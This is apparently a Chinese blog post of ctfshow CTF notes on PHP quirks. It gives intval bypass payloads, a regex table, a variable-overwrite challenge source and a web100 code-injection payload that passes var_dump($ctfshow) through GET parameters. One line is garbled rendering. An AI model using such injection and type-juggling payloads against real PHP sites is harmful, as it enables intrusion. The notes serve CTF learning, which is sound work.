php特性

01

intval函数
通过数组绕过
php特性
php特性

02

php特性
进制转换or加个空格在前面。
payload

?num= 4476
?num=0x117c
?num=010574

03

preg_match() 函数

符号 含义
[abc] A single character: a, b or c
[^abc] Any single character but a, b, or c
[a-z] Any single character in the range a-z
[a-zA-Z] Any single character in the range a-z or A-Z
^ Start of line
$ End of line
\A Start of string
\z End of string
\s Any whitespace character
\S Any non-whitespace character
\d Any digit
\D Any non-digit
\w Any word character (letter, number, underscore)
\W Any non-word character
\b Any word boundary character
(a|b) a or b
a? Zero or one of a
a* Zero or more of a
a+ One or more of a
a{3} Exactly 3 of a
a{3,} 3 or more of a
a{3,6} Between 3 and 6 of a
. Any single character
(…) Capture everything enclosed

04

在linux下面表示当前目录是 ./

05

<?php
include("flag.php");
#若存在GET传值,用POST的值覆盖
$_GET?$_GET=&$_POST:'flag';
#flag参数等于flag,就用$_COOKIE进行覆盖。这里让flag参数不等于flag值就好了
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
#存在HTTP_FLAG参数等于flag,就出最终的flag答案
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>

06

web100
php特性

v 2 ( ′ c t f s h o w ′ ) v2('ctfshow') v2(′ctfshow′)v3,其中v2肯定是命令,v3传分号
v0是三个值相与,v2和v3不传数字和v1数字相与就为1
payload:

?v1=1&v2=var_dump($ctfshow)&v3=;

或者v3直接用内联注释注释掉

?v1=1&v2=var_dump($ctfshow)/*&v3=*/;

07

上一篇:聊聊不可变数据结构


下一篇:PTree